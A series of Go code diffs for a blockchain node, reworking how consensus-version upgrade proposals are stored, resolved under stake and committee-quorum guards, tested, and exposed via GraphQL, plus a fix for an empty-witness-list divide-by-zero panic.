@@ -29,12 +29,15 @@ type ChainConsensusState struct {
 	VersionProposals []VersionProposal `bson:"version_proposals,omitempty"`
 }
 
-// VersionProposal is a single candidate consensus-version switch. Provenance fields
-// (Proposer/TxId/BlockHeight) make reads height-addressable (honored only when
-// BlockHeight < query height) so every signer resolves the identical floor → CID.
+// VersionProposal is a single candidate consensus-version switch. This is LOCAL,
+// non-hashed state (rebuilt from L1 ops on reindex), so it stores the version as a
+// single consensusversion.Version rather than the flat fields the consensus-serialized
+// structs keep for wire-format stability. Provenance fields (Proposer/TxId/BlockHeight)
+// make reads height-addressable (honored only when BlockHeight < query height) so every
+// signer resolves the identical floor → CID.
 type VersionProposal struct {
-	TargetMajor     uint64 `bson:"target_major"`
-	TargetConsensus uint64 `bson:"target_consensus"`
+	// Target is the coordinated version to switch to (non_consensus is not coordinated).
+	Target consensusversion.Version `bson:"target"`
 	// ActivationEpoch is the election epoch at/after which the switch may activate.
 	ActivationEpoch uint64 `bson:"activation_epoch"`
 	// CreationEpoch is the epoch of the proposing block — anchors the fast-fail window.
@@ -48,12 +51,4 @@ type VersionProposal struct {
 	Proposer    string `bson:"proposer"`
 	TxId        string `bson:"tx_id"`
 	BlockHeight uint64 `bson:"block_height"`
-}
-
-// Target returns the coordinated target (non_consensus is not coordinated).
-func (s VersionProposal) Target() consensusversion.Version {
-	return consensusversion.Version{
-		Major:     s.TargetMajor,
-		Consensus: s.TargetConsensus,
-	}
 }

--- a/modules/db/vsc/elections/elections.go
+++ b/modules/db/vsc/elections/elections.go
@@ -204,6 +204,39 @@ func (e *elections) GetElectionByHeight(height uint64) (ElectionResult, error) {
 	}
 }
 
+// ChainActiveVersionAt returns the coordinated consensus version active at blockHeight
+// — the ResultVersion of the most recent election strictly below it ($lt, matching
+// GetElectionByHeight) — queried directly against the live DbInstance.
+//
+// Unlike the GetElectionByHeight method, it does NOT require the elections plugin's
+// collection handle to be Init-bound: it binds a fresh handle from the already-connected
+// DbInstance. That makes it safe to call during early startup — specifically the reindex
+// version-lag gate (reindex.go), which runs before the elections collection plugin is
+// initialized. Calling the method there dereferences a nil *mongo.Collection and panics
+// the node on every restart (the gate only fires once a prior run recorded a version).
+//
+// ok=false when no election precedes blockHeight or the query/decode fails.
+func ChainActiveVersionAt(d *db.DbInstance, blockHeight uint64) (consensusversion.Version, bool) {
+	var rec struct {
+		VersionMajor        uint64 `bson:"version_major"`
+		ProtocolVersion     uint64 `bson:"protocol_version"`
+		VersionNonConsensus uint64 `bson:"version_non_consensus"`
+	}
+	err := d.Collection("elections").FindOne(
+		context.Background(),
+		bson.M{"block_height": bson.M{"$lt": blockHeight}},
+		options.FindOne().SetSort(bson.M{"block_height": -1}),
+	).Decode(&rec)
+	if err != nil {
+		return consensusversion.Version{}, false
+	}
+	return consensusversion.Version{
+		Major:        rec.VersionMajor,
+		Consensus:    rec.ProtocolVersion,
+		NonConsensus: rec.VersionNonConsensus,
+	}, true
+}
+
 // Utility function
 func CalculateSigningScore(circuit *dids.BlsCircuit, election ElectionResult) (uint64, uint64) {
 	IncludedDids := circuit.IncludedDIDs()

--- a/modules/db/vsc/hive_blocks/schema.go
+++ b/modules/db/vsc/hive_blocks/schema.go
@@ -16,6 +16,13 @@ type Document struct {
 	LastStoredBlock    *uint64      `json:"last_stored_block,omitempty" bson:"last_stored_block,omitempty"`
 	HeadHeight         *uint64      `json:"head_height,omitempty" bson:"head_height,omitempty"`
 	ReindexId          *uint64      `json:"reindex_id,omitempty" bson:"reindex_id,omitempty"`
+	// ProcessedUnderMajor/Consensus record the coordinated consensus version of the
+	// binary that last processed up to LastProcessedBlock. On startup the reindex
+	// check compares it against the chain-active version at the head: if the previous
+	// run was BELOW the chain (a version-adoption laggard that diverged) and this
+	// binary is at/above it, a full reindex replays history under the correct rules.
+	ProcessedUnderMajor     *uint64 `json:"processed_under_major,omitempty" bson:"processed_under_major,omitempty"`
+	ProcessedUnderConsensus *uint64 `json:"processed_under_consensus,omitempty" bson:"processed_under_consensus,omitempty"`
 }
 
 // the simplified version of a hive block we store

--- a/modules/election-proposer/election-proposer.go
+++ b/modules/election-proposer/election-proposer.go
@@ -418,6 +418,98 @@ const VSC_ELECTION_TX_ID = "vsc.election_result"
 // rebuild the whole network) only in lockstep.
 const banSystemEnabled = false
 
+// resolveVersionFloor computes the consensus-version floor advance for an election.
+// A recovery override (forced) takes precedence and bypasses the stake-readiness
+// guard; otherwise the floor rises to the HIGHEST candidate target the committee is
+// stake-ready for (readiness is monotonic non-increasing in target) that also keeps
+// the outgoing TSS committee above reshare quorum (H-3/C-2). A junk high target
+// simply never clears readiness, so it cannot block a legitimate lower candidate.
+// Returns the (possibly unchanged) floor. Pure function of its inputs ⇒ every signer
+// reaches the identical result → identical committee CID (Constraint 3).
+//
+// proposals/forced are expected pre-filtered to those recorded before this block
+// (height-addressable). num/den is the stake-readiness fraction (default 4/5).
+func resolveVersionFloor(
+	floor consensusversion.Version,
+	newEpoch uint64,
+	blockHeight uint64,
+	forced *consensus_state.VersionProposal,
+	proposals []consensus_state.VersionProposal,
+	witnessList []witnesses.Witness,
+	weightMap map[string]uint64,
+	previousElection *elections.ElectionResult,
+	num, den int64,
+) consensusversion.Version {
+	// stakeReady: >= num/den of committee STAKE announces a version meeting target.
+	stakeReady := func(target consensusversion.Version) bool {
+		var totalWeight, readyWeight uint64
+		for _, w := range witnessList {
+			wt := weightMap[w.Account]
+			totalWeight += wt
+			if w.ConsensusVersionTriple().MeetsConsensusMin(target) {
+				readyWeight += wt
+			}
+		}
+		return totalWeight > 0 && int64(readyWeight)*den >= int64(totalWeight)*num
+	}
+
+	// H-3/C-2 (TSS vault-freeze prevention): the stake guard only proves the NEW
+	// committee is ready. The OUTGOING committee holds the outstanding TSS key shares,
+	// and both signing AND resharing are gated by this same floor (tss.go:1104/1310) —
+	// advancing past the outgoing committee's readiness can filter its share-holders
+	// below threshold, freezing the vault. Additionally require the previous committee
+	// to retain threshold+1 (= ceil(2N/3) = (2N+2)/3, the GetThreshold+1 quorum)
+	// members meeting target. A prev member no longer a candidate, or not on target,
+	// counts not-ready — which can only BLOCK the advance. Skipped at genesis.
+	prevReadyAt := func(target consensusversion.Version) bool {
+		if previousElection == nil || len(previousElection.Members) == 0 {
+			return true
+		}
+		candidateVer := make(map[string]consensusversion.Version, len(witnessList))
+		for _, w := range witnessList {
+			candidateVer[w.Account] = w.ConsensusVersionTriple()
+		}
+		prevReady := 0
+		for _, m := range previousElection.Members {
+			acct := strings.TrimPrefix(m.Account, "hive:")
+			if v, ok := candidateVer[acct]; ok && v.MeetsConsensusMin(target) {
+				prevReady++
+			}
+		}
+		prevQuorum := (2*len(previousElection.Members) + 2) / 3
+		if prevReady < prevQuorum {
+			log.Warn("H-3/C-2: deferring version-floor advance — outgoing committee below TSS-reshare quorum at target",
+				"block_height", blockHeight, "prev_ready", prevReady, "prev_quorum", prevQuorum, "target", target.Format())
+			return false
+		}
+		return true
+	}
+
+	// Recovery override first: applies past its activation epoch, bypasses both guards.
+	if forced != nil && newEpoch >= forced.ActivationEpoch && forced.Target().Cmp(floor) > 0 {
+		return forced.Target()
+	}
+
+	// Highest live candidate meeting BOTH guards.
+	best := floor
+	for _, p := range proposals {
+		target := p.Target()
+		if newEpoch < p.ActivationEpoch || target.Cmp(floor) <= 0 {
+			continue
+		}
+		if p.ExpiryEpoch != 0 && newEpoch >= p.ExpiryEpoch {
+			continue // expired
+		}
+		if target.Cmp(best) <= 0 {
+			continue // can't improve on the best so far
+		}
+		if stakeReady(target) && prevReadyAt(target) {
+			best = target
+		}
+	}
+	return best
+}
+
 func (e *electionProposer) GenerateFullElection(
 	witnessList []witnesses.Witness,
 	previousEpoch uint64,
@@ -746,76 +838,21 @@ func (e *electionProposer) GenerateFullElection(
 		})
 	}
 
-	// Epoch-scheduled version switch with stake-readiness guard. Resolved here (at the
-	// ratified election checkpoint) rather than via a live singleton, so every signer
-	// regenerating this election at the same height computes the identical floor → CID.
-	// The schedule is read height-addressably (ScheduledActivationForHeight) for purity.
-	var schedule *consensus_state.ScheduledActivation
+	// Consensus-version floor advance, from the bounded candidate set + recovery
+	// override, both read height-addressably (VersionProposalsForHeight /
+	// ForcedActivationForHeight) so every signer regenerating this election computes
+	// the identical floor → CID. resolveVersionFloor is a pure function (unit-tested
+	// in version_floor_test.go) so the consensus-critical decision is reproducible.
 	if e.se != nil {
-		schedule = e.se.ScheduledActivationForHeight(blockHeight)
-	}
-	if schedule != nil &&
-		newEpoch >= schedule.ActivationEpoch && schedule.Target().Cmp(floor) > 0 {
-		target := schedule.Target()
-		var totalWeight, readyWeight uint64
-		for _, w := range witnessList {
-			wt := weightMap[w.Account]
-			totalWeight += wt
-			if w.ConsensusVersionTriple().MeetsConsensusMin(target) {
-				readyWeight += wt
-			}
-		}
-		num, den := int64(
-			e.sconf.ConsensusParams().ConsensusVersionActivationNum,
-		), int64(
-			e.sconf.ConsensusParams().ConsensusVersionActivationDen,
-		)
+		num, den := int64(e.sconf.ConsensusParams().ConsensusVersionActivationNum),
+			int64(e.sconf.ConsensusParams().ConsensusVersionActivationDen)
 		if num <= 0 || den <= 0 {
 			num, den = 4, 5 // default 80%
 		}
-
-		// H-3/C-2 (TSS vault-freeze prevention): the 80% guard above only proves
-		// the NEW committee is ready for the target. But the OUTGOING committee
-		// holds the outstanding TSS key shares, and BOTH signing AND resharing
-		// those keys are gated by this same version floor (tss.go:1104/1310) — so
-		// advancing the floor past the outgoing committee's readiness can filter
-		// its share-holders below threshold, freezing the BTC/ETH/DASH vault
-		// (can't sign, can't reshare to hand off). Additionally require the
-		// previous committee to retain threshold+1 (= ceil(2N/3), the
-		// GetThreshold+1 quorum) members that meet the target. Conservative +
-		// deterministic: a previous member who is no longer a current candidate,
-		// or isn't on the target version, counts as not-ready — which can only
-		// BLOCK the advance (the floor simply waits another epoch; a delayed
-		// version upgrade is never a custody freeze). Skipped at genesis (no
-		// previous committee) and when Forced (recovery override accepts the
-		// risk explicitly). Pure function of previousElection (on-chain) + the
-		// deterministic candidate set + compile-time target ⇒ identical on every
-		// signer (Constraint 3).
-		prevCommitteeReady := true
-		if !schedule.Forced && previousElection != nil && len(previousElection.Members) > 0 {
-			candidateVer := make(map[string]consensusversion.Version, len(witnessList))
-			for _, w := range witnessList {
-				candidateVer[w.Account] = w.ConsensusVersionTriple()
-			}
-			prevReady := 0
-			for _, m := range previousElection.Members {
-				acct := strings.TrimPrefix(m.Account, "hive:")
-				if v, ok := candidateVer[acct]; ok && v.MeetsConsensusMin(target) {
-					prevReady++
-				}
-			}
-			// threshold+1 = ceil(2N/3) = (2N+2)/3 (matches tss_helpers.GetThreshold(N)+1).
-			prevQuorum := (2*len(previousElection.Members) + 2) / 3
-			if prevReady < prevQuorum {
-				prevCommitteeReady = false
-				log.Warn("H-3/C-2: deferring version-floor advance — outgoing committee below TSS-reshare quorum at target",
-					"block_height", blockHeight, "prev_ready", prevReady, "prev_quorum", prevQuorum, "target", target.Format())
-			}
-		}
-
-		// Integer-only comparison: readyWeight/totalWeight >= num/den.
-		if schedule.Forced || (prevCommitteeReady && totalWeight > 0 && int64(readyWeight)*den >= int64(totalWeight)*num) {
-			floor = target
+		if nf := resolveVersionFloor(floor, newEpoch, blockHeight,
+			e.se.ForcedActivationForHeight(blockHeight), e.se.VersionProposalsForHeight(blockHeight),
+			witnessList, weightMap, previousElection, num, den); nf.Cmp(floor) > 0 {
+			floor = nf
 			witnessList = slices.DeleteFunc(witnessList, func(w witnesses.Witness) bool {
 				return !w.ConsensusVersionTriple().MeetsConsensusMin(floor)
 			})

--- a/modules/election-proposer/election-proposer.go
+++ b/modules/election-proposer/election-proposer.go
@@ -486,14 +486,14 @@ func resolveVersionFloor(
 	}
 
 	// Recovery override first: applies past its activation epoch, bypasses both guards.
-	if forced != nil && newEpoch >= forced.ActivationEpoch && forced.Target().Cmp(floor) > 0 {
-		return forced.Target()
+	if forced != nil && newEpoch >= forced.ActivationEpoch && forced.Target.Cmp(floor) > 0 {
+		return forced.Target
 	}
 
 	// Highest live candidate meeting BOTH guards.
 	best := floor
 	for _, p := range proposals {
-		target := p.Target()
+		target := p.Target
 		if newEpoch < p.ActivationEpoch || target.Cmp(floor) <= 0 {
 			continue
 		}

--- a/modules/election-proposer/version_floor_test.go
+++ b/modules/election-proposer/version_floor_test.go
@@ -1,0 +1,138 @@
+package election_proposer
+
+import (
+	"testing"
+
+	"vsc-node/modules/common/consensusversion"
+	"vsc-node/modules/db/vsc/consensus_state"
+	"vsc-node/modules/db/vsc/elections"
+	"vsc-node/modules/db/vsc/witnesses"
+)
+
+// version_floor_test.go covers resolveVersionFloor — the consensus-version floor
+// advance the election proposer applies. This is the guard that actually moves the
+// floor on a proposal, which previously had NO test coverage.
+
+func v(major, consensus uint64) consensusversion.Version {
+	return consensusversion.Version{Major: major, Consensus: consensus}
+}
+
+// wlist builds a committee where the first `ready` witnesses announce `target` and
+// the rest announce `floorV` (below target), all weight 1.
+func wlist(n, ready int, target, floorV consensusversion.Version) ([]witnesses.Witness, map[string]uint64) {
+	ws := make([]witnesses.Witness, 0, n)
+	wm := map[string]uint64{}
+	for i := 0; i < n; i++ {
+		acct := string(rune('a' + i))
+		ver := floorV
+		if i < ready {
+			ver = target
+		}
+		ws = append(ws, witnesses.Witness{Account: acct, VersionMajor: ver.Major, ProtocolVersion: ver.Consensus})
+		wm[acct] = 1
+	}
+	return ws, wm
+}
+
+func prop(major, consensus, activationEpoch, expiryEpoch uint64, proposer string) consensus_state.VersionProposal {
+	return consensus_state.VersionProposal{
+		TargetMajor: major, TargetConsensus: consensus,
+		ActivationEpoch: activationEpoch, ExpiryEpoch: expiryEpoch, Proposer: proposer,
+	}
+}
+
+const num, den = int64(4), int64(5) // 80%
+
+// TestResolveVersionFloor_RisesAtThreshold: 4/5 ready exactly meets 80% → adopt.
+func TestResolveVersionFloor_RisesAtThreshold(t *testing.T) {
+	floor := v(0, 0)
+	target := v(0, 3)
+	ws, wm := wlist(5, 4, target, floor)
+	got := resolveVersionFloor(floor, 2, 100, nil,
+		[]consensus_state.VersionProposal{prop(0, 3, 1, 0, "a")}, ws, wm, nil, num, den)
+	if got.Cmp(target) != 0 {
+		t.Fatalf("floor = %s, want %s (4/5 = 80%% ready meets threshold)", got.Format(), target.Format())
+	}
+}
+
+// TestResolveVersionFloor_StaysBelowThreshold: 3/5 ready (60%) → no advance.
+func TestResolveVersionFloor_StaysBelowThreshold(t *testing.T) {
+	floor := v(0, 0)
+	target := v(0, 3)
+	ws, wm := wlist(5, 3, target, floor)
+	got := resolveVersionFloor(floor, 2, 100, nil,
+		[]consensus_state.VersionProposal{prop(0, 3, 1, 0, "a")}, ws, wm, nil, num, den)
+	if got.Cmp(floor) != 0 {
+		t.Fatalf("floor = %s, want unchanged %s (3/5 < 80%%)", got.Format(), floor.Format())
+	}
+}
+
+// TestResolveVersionFloor_ForcedBypassesReadiness: a recovery override adopts even
+// with zero stake-readiness.
+func TestResolveVersionFloor_ForcedBypassesReadiness(t *testing.T) {
+	floor := v(0, 0)
+	ws, wm := wlist(5, 0, v(0, 5), floor) // nobody announces anything above floor
+	forced := &consensus_state.VersionProposal{TargetMajor: 0, TargetConsensus: 5, ActivationEpoch: 1, Forced: true}
+	got := resolveVersionFloor(floor, 2, 100, forced, nil, ws, wm, nil, num, den)
+	if got.Cmp(v(0, 5)) != 0 {
+		t.Fatalf("floor = %s, want 0.5 (forced bypasses readiness)", got.Format())
+	}
+}
+
+// TestResolveVersionFloor_HighestQualifyingWins: two ready candidates → the higher.
+func TestResolveVersionFloor_HighestQualifyingWins(t *testing.T) {
+	floor := v(0, 0)
+	ws, wm := wlist(5, 5, v(0, 4), floor) // all 5 announce 0.4 (so ready for 0.3 and 0.4)
+	props := []consensus_state.VersionProposal{prop(0, 3, 1, 0, "a"), prop(0, 4, 1, 0, "b")}
+	got := resolveVersionFloor(floor, 2, 100, nil, props, ws, wm, nil, num, den)
+	if got.Cmp(v(0, 4)) != 0 {
+		t.Fatalf("floor = %s, want 0.4 (highest qualifying candidate)", got.Format())
+	}
+}
+
+// TestResolveVersionFloor_PoisonIgnored: a junk high target nobody runs cannot block
+// a legitimate lower one that is ready.
+func TestResolveVersionFloor_PoisonIgnored(t *testing.T) {
+	floor := v(0, 0)
+	ws, wm := wlist(5, 5, v(0, 3), floor) // all ready for 0.3, none for 99.0
+	props := []consensus_state.VersionProposal{prop(0, 3, 1, 0, "a"), prop(99, 0, 1, 0, "griefer")}
+	got := resolveVersionFloor(floor, 2, 100, nil, props, ws, wm, nil, num, den)
+	if got.Cmp(v(0, 3)) != 0 {
+		t.Fatalf("floor = %s, want 0.3 (poison 99.0 ignored, real 0.3 adopted)", got.Format())
+	}
+}
+
+// TestResolveVersionFloor_PrevCommitteeQuorumBlocks: the new committee is fully
+// ready, but the OUTGOING committee is below TSS-reshare quorum at target → blocked.
+func TestResolveVersionFloor_PrevCommitteeQuorumBlocks(t *testing.T) {
+	floor := v(0, 0)
+	target := v(0, 3)
+	ws, wm := wlist(3, 3, target, floor) // new committee 100% ready
+	// Previous committee: 3 members, but only 1 is a current candidate on target
+	// (the other two churned out) → prevReady=1 < quorum ceil(2*3/3)=2 → blocked.
+	prev := &elections.ElectionResult{ElectionDataInfo: elections.ElectionDataInfo{
+		Members: []elections.ElectionMember{{Account: "a"}, {Account: "x"}, {Account: "y"}},
+	}}
+	got := resolveVersionFloor(floor, 2, 100, nil,
+		[]consensus_state.VersionProposal{prop(0, 3, 1, 0, "a")}, ws, wm, prev, num, den)
+	if got.Cmp(floor) != 0 {
+		t.Fatalf("floor = %s, want unchanged (outgoing committee below reshare quorum)", got.Format())
+	}
+}
+
+// TestResolveVersionFloor_SubFloorAndExpiredAndInactiveSkipped: candidates at/below
+// floor, past expiry, or before activation epoch are not adopted.
+func TestResolveVersionFloor_SubFloorAndExpiredAndInactiveSkipped(t *testing.T) {
+	floor := v(0, 2)
+	ws, wm := wlist(5, 5, v(0, 9), floor) // everyone ready for anything
+	props := []consensus_state.VersionProposal{
+		prop(0, 2, 1, 0, "a"),  // == floor → skip
+		prop(0, 1, 1, 0, "b"),  // < floor → skip
+		prop(0, 3, 1, 5, "c"),  // expired (expiry 5 <= epoch 10) → skip
+		prop(0, 4, 99, 0, "d"), // not yet active (activation 99 > epoch 10) → skip
+	}
+	got := resolveVersionFloor(floor, 10, 100, nil, props, ws, wm, nil, num, den)
+	if got.Cmp(floor) != 0 {
+		t.Fatalf("floor = %s, want unchanged %s (all candidates ineligible)", got.Format(), floor.Format())
+	}
+}

--- a/modules/election-proposer/version_floor_test.go
+++ b/modules/election-proposer/version_floor_test.go
@@ -36,7 +36,7 @@ func wlist(n, ready int, target, floorV consensusversion.Version) ([]witnesses.W
 
 func prop(major, consensus, activationEpoch, expiryEpoch uint64, proposer string) consensus_state.VersionProposal {
 	return consensus_state.VersionProposal{
-		TargetMajor: major, TargetConsensus: consensus,
+		Target:          v(major, consensus),
 		ActivationEpoch: activationEpoch, ExpiryEpoch: expiryEpoch, Proposer: proposer,
 	}
 }
@@ -72,7 +72,7 @@ func TestResolveVersionFloor_StaysBelowThreshold(t *testing.T) {
 func TestResolveVersionFloor_ForcedBypassesReadiness(t *testing.T) {
 	floor := v(0, 0)
 	ws, wm := wlist(5, 0, v(0, 5), floor) // nobody announces anything above floor
-	forced := &consensus_state.VersionProposal{TargetMajor: 0, TargetConsensus: 5, ActivationEpoch: 1, Forced: true}
+	forced := &consensus_state.VersionProposal{Target: v(0, 5), ActivationEpoch: 1, Forced: true}
 	got := resolveVersionFloor(floor, 2, 100, forced, nil, ws, wm, nil, num, den)
 	if got.Cmp(v(0, 5)) != 0 {
 		t.Fatalf("floor = %s, want 0.5 (forced bypasses readiness)", got.Format())

--- a/modules/gql/gqlgen/schema.resolvers.go
+++ b/modules/gql/gqlgen/schema.resolvers.go
@@ -566,7 +566,7 @@ func (r *queryResolver) LocalNodeInfo(ctx context.Context) (*LocalNodeInfo, erro
 	}
 	for _, p := range r.StateEngine.ConsensusVersionProposals() {
 		info.ConsensusVersionProposals = append(info.ConsensusVersionProposals, ConsensusVersionProposal{
-			Target:          p.Target().Format(),
+			Target:          p.Target.Format(),
 			ActivationEpoch: model.Uint64(p.ActivationEpoch),
 			CreationEpoch:   model.Uint64(p.CreationEpoch),
 			ExpiryEpoch:     model.Uint64(p.ExpiryEpoch),
@@ -586,7 +586,7 @@ func (r *queryResolver) LocalNodeInfo(ctx context.Context) (*LocalNodeInfo, erro
 		info.ConsensusActivationEpoch = &ep
 		ab := model.Uint64(act.BlockHeight)
 		info.ConsensusActivationAttestedBlock = &ab
-		av := act.Target().Format()
+		av := act.Target.Format()
 		info.ConsensusActivationVersion = &av
 		if act.TxId != "" {
 			info.ConsensusActivationAttestedTxid = &act.TxId

--- a/modules/gql/gqlgen/schema.resolvers.go
+++ b/modules/gql/gqlgen/schema.resolvers.go
@@ -19,6 +19,7 @@ import (
 	"vsc-node/lib/datalayer"
 	"vsc-node/modules/announcements"
 	"vsc-node/modules/common"
+	"vsc-node/modules/common/consensusversion"
 	"vsc-node/modules/common/params"
 	contract_execution_context "vsc-node/modules/contract/execution-context"
 	contract_session "vsc-node/modules/contract/session"
@@ -551,15 +552,28 @@ func (r *queryResolver) LocalNodeInfo(ctx context.Context) (*LocalNodeInfo, erro
 		return nil, electionErr
 	}
 	info := &LocalNodeInfo{
-		GitCommit:               announcements.GitCommit,
-		VersionID:               announcements.VersionId,
-		LastProcessedBlock:      model.Uint64(head),
-		Epoch:                   model.Uint64(election.Epoch),
-		ConsensusVersionDisplay: r.StateEngine.DisplayConsensusVersion(),
-		ProcessingSuspended:     r.StateEngine.ProcessingSuspendedForPool(),
-		ActiveConsensusLine:     r.StateEngine.ActiveConsensusLine(head).Key(),
-		ActiveConsensusExecutor: r.StateEngine.ActiveConsensusExecutor(head).Name(),
-		ChainOracles:            []ChainOracleStatus{},
+		GitCommit:                 announcements.GitCommit,
+		VersionID:                 announcements.VersionId,
+		RunningVersion:            consensusversion.RunningVersion().Format(),
+		LastProcessedBlock:        model.Uint64(head),
+		Epoch:                     model.Uint64(election.Epoch),
+		ConsensusVersionDisplay:   r.StateEngine.DisplayConsensusVersion(),
+		ProcessingSuspended:       r.StateEngine.ProcessingSuspendedForPool(),
+		ActiveConsensusLine:       r.StateEngine.ActiveConsensusLine(head).Key(),
+		ActiveConsensusExecutor:   r.StateEngine.ActiveConsensusExecutor(head).Name(),
+		ConsensusVersionProposals: []ConsensusVersionProposal{},
+		ChainOracles:              []ChainOracleStatus{},
+	}
+	for _, p := range r.StateEngine.ConsensusVersionProposals() {
+		info.ConsensusVersionProposals = append(info.ConsensusVersionProposals, ConsensusVersionProposal{
+			Target:          p.Target().Format(),
+			ActivationEpoch: model.Uint64(p.ActivationEpoch),
+			CreationEpoch:   model.Uint64(p.CreationEpoch),
+			ExpiryEpoch:     model.Uint64(p.ExpiryEpoch),
+			Forced:          p.Forced,
+			Proposer:        p.Proposer,
+			Txid:            p.TxId,
+		})
 	}
 	if act := r.StateEngine.ConsensusActivation(); act != nil {
 		mode := "normal"

--- a/modules/gql/schema.graphql
+++ b/modules/gql/schema.graphql
@@ -411,6 +411,10 @@ type LocalNodeInfo {
   """
   version_id: String!
   """
+  This node's own running consensus version (major.consensus.non_consensus) compiled into the binary. Compare against active_consensus_line to spot a node behind the chain.
+  """
+  running_version: String!
+  """
   Git commit hash of the running binary.
   """
   git_commit: String!
@@ -459,9 +463,48 @@ type LocalNodeInfo {
   """
   consensus_activation_attested_txid: String
   """
+  The full set of pending consensus-version candidate proposals (and the recovery override, if any). consensus_activation_* above is the headline entry; this is the complete set.
+  """
+  consensus_version_proposals: [ConsensusVersionProposal!]!
+  """
   Status of each registered chain oracle.
   """
   chain_oracles: [ChainOracleStatus!]!
+}
+
+"""
+A single pending consensus-version candidate proposal (vsc.propose_consensus_version),
+or the recovery-multisig forced override (forced=true).
+"""
+type ConsensusVersionProposal {
+  """
+  Target consensus version display (major.consensus).
+  """
+  target: String!
+  """
+  Election epoch at/after which the switch may activate.
+  """
+  activation_epoch: Uint64!
+  """
+  Epoch of the proposing block (anchors the no-traction fast-fail window).
+  """
+  creation_epoch: Uint64!
+  """
+  Hard-deadline epoch; the proposal is pruned once an election reaches it (0 = no deadline, e.g. forced).
+  """
+  expiry_epoch: Uint64!
+  """
+  True for the recovery-multisig forced override (bypasses the stake-readiness guard).
+  """
+  forced: Boolean!
+  """
+  Proposer account (the committee member that submitted it).
+  """
+  proposer: String!
+  """
+  Transaction id that submitted the proposal.
+  """
+  txid: String!
 }
 
 """

--- a/modules/state-processing/consensus.go
+++ b/modules/state-processing/consensus.go
@@ -65,6 +65,15 @@ type WitnessSlot struct {
 
 func GenerateSchedule(blockHeight uint64, witnessList []Witness, seed [32]byte) []WitnessSlot {
 
+	// F13 fix: an empty witness list makes `slot % len(witnessList)` below a
+	// divide-by-zero panic that fires identically on every node (network halt).
+	// Return an empty schedule (= no producer this round), which callers already
+	// treat as "nobody scheduled". Deterministic: witnessList is on-chain election
+	// data. Defense-in-depth behind the proposer's MinMembers floor.
+	if len(witnessList) == 0 {
+		return []WitnessSlot{}
+	}
+
 	roundInfo := vscBlocks.CalculateRoundInfo(blockHeight)
 
 	slots := (roundInfo.EndHeight - roundInfo.StartHeight) / CONSENSUS_SPECS.SlotLength

--- a/modules/state-processing/consensus.go
+++ b/modules/state-processing/consensus.go
@@ -69,7 +69,8 @@ func GenerateSchedule(blockHeight uint64, witnessList []Witness, seed [32]byte) 
 	// divide-by-zero panic that fires identically on every node (network halt).
 	// Return an empty schedule (= no producer this round), which callers already
 	// treat as "nobody scheduled". Deterministic: witnessList is on-chain election
-	// data. Defense-in-depth behind the proposer's MinMembers floor.
+	// data. Defense-in-depth behind the GV4-3 sub-MinMembers election reject in
+	// TxElectionResult.ExecuteTx (and the proposer's MinMembers floor).
 	if len(witnessList) == 0 {
 		return []WitnessSlot{}
 	}

--- a/modules/state-processing/consensus_gv4_3_test.go
+++ b/modules/state-processing/consensus_gv4_3_test.go
@@ -1,0 +1,48 @@
+package state_engine
+
+import "testing"
+
+// TestGenerateScheduleEmptyWitnessListNoPanic verifies the GV4-3 scheduler
+// backstop: GenerateSchedule must not panic (it previously did
+// witnessList[slot % uint64(len(witnessList))], an integer divide-by-zero when
+// the list is empty) but instead return an empty schedule. This is the
+// last-resort guard behind the TxElectionResult.ExecuteTx MinMembers reject; if
+// a degenerate (0-member) election ever reaches scheduling, the node degrades to
+// "no producer this round" rather than panic-crashing the whole network.
+//
+// The full multi-node behaviour (empty election accepted with the guard off ->
+// every node crashes; rejected with the guard on -> chain stays alive) is proven
+// on devnet by tests/devnet TestGV43SubMinElectionHalt / ...Guarded.
+func TestGenerateScheduleEmptyWitnessListNoPanic(t *testing.T) {
+	var seed [32]byte
+	cases := map[string][]Witness{
+		"empty": {},
+		"nil":   nil,
+	}
+	for name, wl := range cases {
+		t.Run(name, func(t *testing.T) {
+			// Must not panic.
+			sched := GenerateSchedule(100, wl, seed)
+			if len(sched) != 0 {
+				t.Fatalf("expected empty schedule for %s witness list, got %d slots", name, len(sched))
+			}
+		})
+	}
+}
+
+// TestGenerateScheduleNonEmptyStillSchedules is a sanity check that the backstop
+// did not change normal scheduling: a valid (>= MinMembers) witness set still
+// yields a populated schedule.
+func TestGenerateScheduleNonEmptyStillSchedules(t *testing.T) {
+	var seed [32]byte
+	wl := []Witness{{Account: "a"}, {Account: "b"}, {Account: "c"}}
+	sched := GenerateSchedule(100, wl, seed)
+	if len(sched) == 0 {
+		t.Fatalf("expected a non-empty schedule for a %d-witness list", len(wl))
+	}
+	for i, slot := range sched {
+		if slot.Account == "" {
+			t.Fatalf("schedule slot %d has empty account", i)
+		}
+	}
+}

--- a/modules/state-processing/consensus_runtime.go
+++ b/modules/state-processing/consensus_runtime.go
@@ -90,7 +90,7 @@ func (se *StateEngine) ConsensusActivation() *consensus_state.VersionProposal {
 	props := se.versionProposals()
 	var best *consensus_state.VersionProposal
 	for i := range props {
-		if best == nil || props[i].Target().Cmp(best.Target()) > 0 {
+		if best == nil || props[i].Target.Cmp(best.Target) > 0 {
 			p := props[i]
 			best = &p
 		}

--- a/modules/state-processing/consensus_runtime.go
+++ b/modules/state-processing/consensus_runtime.go
@@ -80,9 +80,32 @@ func lineFromVersion(v consensusversion.Version) ConsensusLine {
 	return ConsensusLine{Major: v.Major, Consensus: v.Consensus}
 }
 
-// ConsensusActivation reports the pending scheduled version switch (for API visibility).
-func (se *StateEngine) ConsensusActivation() *consensus_state.ScheduledActivation {
-	return se.scheduledActivation()
+// ConsensusActivation reports the headline pending switch for API visibility: the
+// recovery override if one is set, else the highest-target normal proposal (nil if
+// none). Use ConsensusVersionProposals for the full candidate set.
+func (se *StateEngine) ConsensusActivation() *consensus_state.VersionProposal {
+	if f := se.forcedActivation(); f != nil {
+		return f
+	}
+	props := se.versionProposals()
+	var best *consensus_state.VersionProposal
+	for i := range props {
+		if best == nil || props[i].Target().Cmp(best.Target()) > 0 {
+			p := props[i]
+			best = &p
+		}
+	}
+	return best
+}
+
+// ConsensusVersionProposals returns a copy of the full pending candidate set
+// (with the recovery override appended, if any) for API visibility.
+func (se *StateEngine) ConsensusVersionProposals() []consensus_state.VersionProposal {
+	props := se.versionProposals()
+	if f := se.forcedActivation(); f != nil {
+		props = append(props, *f)
+	}
+	return props
 }
 
 // ActiveConsensusLine returns the coordinated major.consensus line for a block height,

--- a/modules/state-processing/consensus_version.go
+++ b/modules/state-processing/consensus_version.go
@@ -211,8 +211,7 @@ func (se *StateEngine) executeProposeConsensusVersion(tx *TxProposeConsensusVers
